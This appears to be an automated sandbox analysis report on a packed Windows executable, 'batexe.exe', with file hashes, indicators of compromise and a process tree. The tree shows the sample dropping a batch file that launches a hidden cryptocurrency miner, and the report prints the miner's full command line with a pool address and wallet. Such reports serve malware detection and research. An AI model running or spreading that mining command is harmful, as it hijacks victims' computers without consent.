73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 07:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2316	b2e.exe
4880	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4880	cpuminer-sse2.exe
4880	cpuminer-sse2.exe
4880	cpuminer-sse2.exe
4880	cpuminer-sse2.exe
4880	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4856-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 2316	4856	batexe.exe	75
PID 4856 wrote to memory of 2316	4856	batexe.exe	75
PID 4856 wrote to memory of 2316	4856	batexe.exe	75
PID 2316 wrote to memory of 2572	2316	b2e.exe	76
PID 2316 wrote to memory of 2572	2316	b2e.exe	76
PID 2316 wrote to memory of 2572	2316	b2e.exe	76
PID 2572 wrote to memory of 4880	2572	cmd.exe	79
PID 2572 wrote to memory of 4880	2572	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4856
- C:\Users\Admin\AppData\Local\Temp\B9EA.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B9EA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B9EA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC3B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B9EA.tmp\b2e.exe

Filesize
4.3MB

MD5
225ad63ae4285536842ee1ca4b56e051

SHA1
73d1fcf4006c841ffcfa1269566d8543a5aaf7d2

SHA256
23c4e0cec42cfccabe7c01b688e5d50a0d271897860bb8b395ca6e8e6e6fbc13

SHA512
2dbceb2eab4bb328a2f5569013574eb7bb07f0c3539cab08a00e383124a4d08bf414739cc50380b10c8a1079cabc410323d4b1fbe99e61361d3a52372c46d88b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B9EA.tmp\b2e.exe

Filesize
14.2MB

MD5
8c0d043fbe963999d0c663076b9c65e6

SHA1
90a8a39300fc3c0224d38d803930dfb977924ddf

SHA256
1471f31bd6afe0bb6f881c2dbbb296ec491e0c29dd5b0ddbf3d921147df3fed3

SHA512
f1e0c8344df2d7296c9a647c21e79e1c16df525870b5312c5b3552aeb89a4b76177d04931e8774faabeeec5d160ffd14f03bf501f0422325da4b99800fd36ea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC3B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
23d79e5c9aab672f8f60c5eebe49095a

SHA1
a104fcef7239607ddf1efe7b2c23e746dfbd0dcf

SHA256
698e05c0e81105d7f7175ef33574ef428340bd4729564a58f6190349283e636a

SHA512
03fbe3b84107563ea0e7b6b345b4cb4a3bd09153068643c1a96e53bf7504b004458859dfea0c66da065defc293436f3449e568b922f1796f33850f145f8a07eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.7MB

MD5
e57f145228bca9f96dc0b7978eea732f

SHA1
ecc9f2f0be3bc6e1cc81b2360f45bf285992d592

SHA256
987a1f9622f14a27ee140321d0d65a4819e90bb884b4aba5c4b8be82108e2756

SHA512
ae9ced26007df152e551c3e91975d9dacc4abfffca8704abb232cab23784da42a1b80ba2cbe616ed012cdac230fd30552d0af95bc84bb307344bd6bdb60a214e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1024KB

MD5
61f1013547dc4ad24f8c5338c41931c3

SHA1
4a9f72fe7e71046ecd3d5af6443f195a6051430b

SHA256
2a65749eaa95c5c90be12d11587a82432933aabd60e8854868bc7168a36150ee

SHA512
6604219c7e5d583e8cc6a1f407e9964ab39791026857d17c9de25d3a4a8bb0272d491c6c019643eeeee8a2bd3451f3e0b75298e043777d44b8f3a161582c9b40

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
c89e863ce2221a0f49b45a55100e468c

SHA1
569ede311983a53a8f23f254fe37735538cbfa5e

SHA256
5ca5fb55f2e5ddee30c893b0e78d1ad59f593c2c3e5ecc155f14a088c65cfb46

SHA512
f65476f7353ef6ca7378752551c28736b61916cbf54f0a17b211a5a14ab93ddc2830a1d9c3cc1118117a23be95d49b06fc8a174d1a87f360ae4b96a6bbde04b0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
03ae1346c99a66fcbd06c3a56898820a

SHA1
cf57878eb1c3523d08468ba3e9e65a063c24d902

SHA256
bdb28d28d4f6093c2bbf0cbdf1b2edaf325ad34c214cde4123437896488dc445

SHA512
b1e6f93db804c65f996ae29123a601ee95830391d9f5b73608962cbcd25a9082f1b1f9a6e732e5f84bfa3bd7207101edf9d076445370150ae58c9dcace634260

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2316-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2316-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4856-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4880-42-0x0000000060AA0000-0x0000000060B38000-memory.dmp

Filesize
608KB

Download
memory/4880-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4880-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4880-44-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/4880-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4880-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download